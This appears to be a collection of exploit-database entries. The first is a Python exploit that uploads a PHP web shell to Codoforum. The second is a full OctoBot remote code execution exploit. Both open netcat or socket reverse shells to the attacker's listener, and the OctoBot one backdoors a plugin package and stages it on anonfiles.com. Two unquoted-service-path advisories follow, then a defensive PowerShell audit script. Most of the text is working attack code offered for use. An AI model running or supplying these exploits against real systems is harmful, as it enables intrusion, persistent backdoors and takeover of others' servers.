[username] -p [password] -i [listener ip] -n [listener port]")<br /> print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help")<br /> exit()<br /><br />loginURL = options.target + '/admin/?page=login'<br />globalSettings = options.target + '/admin/index.php?page=config'<br />payloadURL = options.target + '/sites/default/assets/img/attachments/'<br /><br />session = requests.Session()<br /><br />randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10)))<br /><br />def getPHPSESSID():<br /> <br /> try:<br /> get_PHPID = session.get(loginURL)<br /> headerDict = get_PHPID.headers<br /> cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1]<br /> return cookies<br /> except:<br /> exit()<br /><br />phpID = getPHPSESSID()<br /><br />def login():<br /> send_cookies = {'cf':'0'}<br /> send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'}<br /> send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--"<br /> auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy)<br /><br /> if "CODOFORUM | Dashboard" in auth.text:<br /> print("[+] Login successful")<br /><br />def uploadAndExploit():<br /> send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID}<br /> send_headers = 
{'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'}<br /> send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: 
form-data; name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n'<br /> exploit = 
requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy)<br /><br /> print("[*] Checking webshell status and executing...")<br /> payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy)<br /> if payloadExec.status_code == 200:<br /> print("[+] Payload uploaded successfully and executed, check listener")<br /> else:<br /> print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])")<br />login()<br />uploadAndExploit()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)<br /># Date: 9/2/2021<br /># Exploit Author: Samy Younsi, Thomas Knudsen<br /># Vendor Homepage: https://www.octobot.online/<br /># Software Link: https://github.com/Drakkar-Software/OctoBot<br /># Version: 0.4.0beta3 - 0.4.3<br /># Tested on: Linux (Ubuntu, CentOs)<br /># CVE : CVE-2021-36711<br /><br />from __future__ import print_function, unicode_literals<br />from bs4 import BeautifulSoup<br />import argparse<br />import requests<br />import zipfile<br />import time<br />import sys<br />import os<br /><br />def banner():<br /> sashimiLogo = """<br /> _________ . .<br /> (.. \_ , |\ /|<br /> \ O \ /| \ \/ /<br /> \______ \/ | \ / <br /> vvvv\ \ | / |<br /> _ _ _ _ \^^^^ == \_/ |<br /> | | __ _ | || |__ (_)_ __ ___ (_)`\_ === \. |<br />/ __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_ \ / |<br />\__ | (_| \__ | | | | | | | | | | ||/ \_ \| /<br />( /\__,_( |_| |_|_|_| |_| |_|_| \________/<br /> |_| |_| \033[1;91mOctoBot Killer\033[1;m <br />Author: \033[1;92mNaqwada\033[1;m <br />RuptureFarm 1029 <br /><br /> FOR EDUCATIONAL PURPOSE ONLY. <br /> """<br /> return print('\033[1;94m{}\033[1;m'.format(sashimiLogo))<br /><br /><br />def help():<br /> print('[!] 
\033[1;93mUsage: \033[1;m')<br /> print('[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(sys.argv[0]))<br /> print('[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.')<br /><br /><br />def getOctobotVersion(RHOST, RPORT):<br /> if RPORT == 443:<br /> url = 'https://{}:{}/api/version'.format(RHOST, RPORT)<br /> else:<br /> url = 'http://{}:{}/api/version'.format(RHOST, RPORT)<br /> return curl(url) <br /><br /><br />def restartOctobot(RHOST, RPORT):<br /> if RPORT == 443:<br /> url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT)<br /> else:<br /> url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT)<br /> <br /> try:<br /> requests.get(url, allow_redirects=False, verify=False, timeout=1)<br /> except requests.exceptions.ConnectionError as e: <br /> print('[+] \033[1;92mOctoBot is restarting ... 
Please wait 30 seconds.\033[1;m')<br /> time.sleep(30)<br /><br /><br />def downloadTentaclePackage(octobotVersion):<br /> print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion))<br /> url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion)<br /> result = requests.get(url, stream=True)<br /> with open('{}.zip'.format(octobotVersion), 'wb') as fd:<br /> for chunk in result.iter_content(chunk_size=128):<br /> fd.write(chunk)<br /> print('[+] \033[1;92mDownload completed!\033[1;m')<br /><br /><br />def unzipTentaclePackage(octobotVersion):<br /> zip = zipfile.ZipFile('{}.zip'.format(octobotVersion))<br /> zip.extractall('quests')<br /> os.remove('{}.zip'.format(octobotVersion))<br /> print('[+] \033[1;92mTentacle package has been extracted.\033[1;m')<br /><br /><br />def craftBackdoor(octobotVersion):<br /> print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion))<br /> path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/'<br /> injectInitFile(path)<br /> injectMetadataFile(path)<br /> print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion))<br /><br /><br />def injectMetadataFile(path):<br /> with open('{}metadata.py'.format(path),'r') as metadataFile:<br /> content = metadataFile.read()<br /> addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty'))<br /> addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")'))<br /> with open('{}metadata.py'.format(path),'w') as newMetadataFile:<br /> 
newMetadataFile.write(addPayload)<br /><br /><br />def injectInitFile(path):<br /> with open('{}__init__.py'.format(path),'r') as initFile:<br /> content = initFile.read()<br /> addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,'))<br /> addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",'))<br /> with open('{}__init__.py'.format(path),'w') as newInitFile:<br /> newInitFile.write(addPayload)<br /><br /><br />def rePackTentaclePackage():<br /> print('[+] \033[1;92mRepacking Tentacle package.\033[1;m')<br /> with zipfile.ZipFile('any_platform.zip', mode='w') as zipf:<br /> len_dir_path = len('quests')<br /> for root, _, files in os.walk('quests'):<br /> for file in files:<br /> file_path = os.path.join(root, file)<br /> zipf.write(file_path, file_path[len_dir_path:])<br /><br /><br />def uploadMaliciousTentacle():<br /> print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com... May take a minute.\033[1;m')<br /><br /> file = {<br /> 'file': open('any_platform.zip', 'rb'),<br /> }<br /> response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60)<br /> zipLink = response.json()['data']['file']['url']['full']<br /> response = requests.get(zipLink, timeout=60)<br /> soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')<br /> zipLink = soup.find(id='download-url').get('href')<br /> print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink))<br /> return zipLink<br /><br />def curl(url):<br /> response = requests.get(url, allow_redirects=False, verify=False, timeout=60)<br /> return response<br /><br /><br />def injectBackdoor(RHOST, RPORT, zipLink):<br /> print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Octobot... 
May take a minute.\033[1;m')<br /> if RPORT == 443:<br /> url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)<br /> else:<br /> url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT) <br /><br /> headers = {<br /> 'Content-Type': 'application/json',<br /> 'X-Requested-With': 'XMLHttpRequest',<br /> }<br /> <br /> data = '{"'+zipLink+'":"register_and_install"}'<br /><br /> response = requests.post(url, headers=headers, data=data)<br /> response = response.content.decode('utf-8').replace('"', '').strip()<br /> <br /> os.remove('any_platform.zip')<br /> <br /> if response != 'Tentacles installed':<br /> print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m')<br /> exit()<br /> print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m')<br /><br /><br />def execReverseShell(RHOST, RPORT, LHOST, LPORT):<br /> print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT))<br /> if RPORT == 443:<br /> url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)<br /> else:<br /> url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)<br /> return curl(url) <br /><br />def isPassword(RHOST, RPORT):<br /> if RPORT == 443:<br /> url = 'https://{}:{}'.format(RHOST, RPORT)<br /> else:<br /> url = 'http://{}:{}'.format(RHOST, RPORT)<br /> return curl(url)<br /> <br />def main():<br /> banner()<br /> args = parser.parse_args()<br /><br /> if isPassword(args.RHOST, args.RPORT).status_code != 200:<br /> print('[!] 
\033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m')<br /><br /> octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','')<br /><br /> if len(octobotVersion) > 0:<br /> print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion))<br /><br /> downloadTentaclePackage(octobotVersion)<br /> unzipTentaclePackage(octobotVersion)<br /> craftBackdoor(octobotVersion)<br /> rePackTentaclePackage()<br /> zipLink = uploadMaliciousTentacle()<br /> injectBackdoor(args.RHOST, args.RPORT, zipLink)<br /> restartOctobot(args.RHOST, args.RPORT)<br /> execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)<br /><br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False)<br /> parser.add_argument('-h', '--help', help=help())<br /> parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True)<br /> parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)<br /> parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)<br /> parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)<br /> main()<br /> <br /></code></pre>
<pre><code># Exploit Title: Kite 1.2021.610.0 - Unquoted Service Path<br /># Date: 2020-11-6<br /># Exploit Author: Ghaleb Al-otaibi<br /># Vendor Homepage: https://www.kite.com/<br /># Version: Version 4.2.0.1 U1<br /># Tested on: Microsoft Windows 10 Pro - 10.0.19044 N/A Build 19044<br /># CVE : NA<br /><br /># Service info:<br />C:\Windows\system32\cmd.exe>sc qc KiteService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: KiteService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files\Kite\KiteService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : KiteService<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: Dr. Fone v4.0.8 - 'net_updater32.exe' Unquoted Service Path<br /># Discovery Date: 2022-05-07<br /># Discovery by: Esant1490<br /># Vendor Homepage: https://drfone.wondershare.net<br /># Software Link : https://download.wondershare.net/drfone_full4008.exe<br /># Tested Version: 4.0.8<br /># Tested on OS: Windows 10 Pro x64 en<br /># Vulnerability Type: Unquoted Service Path<br /><br /># Finding the Unquoted Service Path vulnerability:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"<br />|findstr /i /v "C:\Windows\\" |findstr /i /v """<br /><br />Wondershare Install Assist Service Wondershare InstallAssist<br />C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto<br /><br />Wondershare Application Framework Service WsAppService C:\Program Files<br />(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto<br />Wondershare Application Update Service 3.0<br /><br />WsAppService3 C:\Program Files<br />(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto<br /><br />Wondershare Driver Install Service WsDrvInst C:\Program Files<br />(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto<br /><br /># Service info:<br /><br />C:\>sc qc WsDrvInst<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: WsDrvInst<br />TIPO : 10 WIN32_OWN_PROCESS<br />TIPO_INICIO : 2 AUTO_START<br />CONTROL_ERROR : 1 NORMAL<br />NOMBRE_RUTA_BINARIO: C:\Program Files<br />(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe<br />GRUPO_ORDEN_CARGA :<br />ETIQUETA : 0<br />NOMBRE_MOSTRAR : Wondershare Driver Install Service<br />DEPENDENCIAS : RPCSS<br />NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br /># Exploit:<br /><br />A successful attempt to exploit this vulnerability could allow code execution<br />during startup or reboot with elevated privileges.<br /><br /></code></pre>
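The two unquoted-service-path advisories above (Kite and Dr. Fone) both reduce to the same audit: an auto-start service, running as LocalSystem, whose unquoted binary path contains a space. The following PowerShell script is an added audit-and-remediation example, not part of either advisory: it applies the same filter as the wmic | findstr pipeline using Win32_Service and, when run elevated with -Fix, re-registers each affected path with the executable quoted.

```powershell
# Added audit/remediation helper; not part of the Kite or Dr. Fone advisories.
# Finds auto-start services whose unquoted binary path contains a space (the
# condition the wmic | findstr pipeline above selects for) and, with -Fix,
# re-registers the path with the executable quoted. -Fix needs an elevated shell.
param(
    [switch]$Fix   # report only unless given
)

function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.StartMode -eq 'Auto' -and
            $_.PathName -and
            $_.PathName -notmatch '^\s*"' -and             # already quoted: fine
            $_.PathName -notmatch '^[A-Za-z]:\\Windows\\'   # same exclusion as the advisory
        } |
        ForEach-Object {
            # Executable = everything up to and including the first ".exe";
            # the remainder is arguments and plays no part in the path lookup.
            $exe = ($_.PathName -split '(?<=\.exe)', 2)[0]
            if ($exe -match ' ') {
                [pscustomobject]@{
                    Name       = $_.Name
                    StartName  = $_.StartName      # LocalSystem in both advisories
                    Executable = $exe
                    Arguments  = $_.PathName.Substring($exe.Length).Trim()
                    Service    = $_
                }
            }
        }
}

$findings = @(Get-UnquotedServicePath)
if ($findings.Count -eq 0) { Write-Host 'No unquoted service paths with spaces found.'; return }

$findings | Select-Object Name, StartName, Executable, Arguments | Format-Table -AutoSize

if ($Fix) {
    foreach ($f in $findings) {
        # Win32_Service.Change rewrites BINARY_PATH_NAME without sc.exe quoting games.
        $quoted = '"{0}"' -f $f.Executable
        if ($f.Arguments) { $quoted = "$quoted $($f.Arguments)" }
        $r = Invoke-CimMethod -InputObject $f.Service -MethodName Change -Arguments @{ PathName = $quoted }
        if ($r.ReturnValue -eq 0) { Write-Host "Quoted $($f.Name): $quoted" }
        else { Write-Warning "Change failed for $($f.Name) (return $($r.ReturnValue))" }
    }
}
```

Quoting the path removes the ambiguous lookup, but the finding only matters when a low-privileged user can write to one of the intermediate directories (for example C:\Program Files), so check the ACLs on those directories as part of the same review.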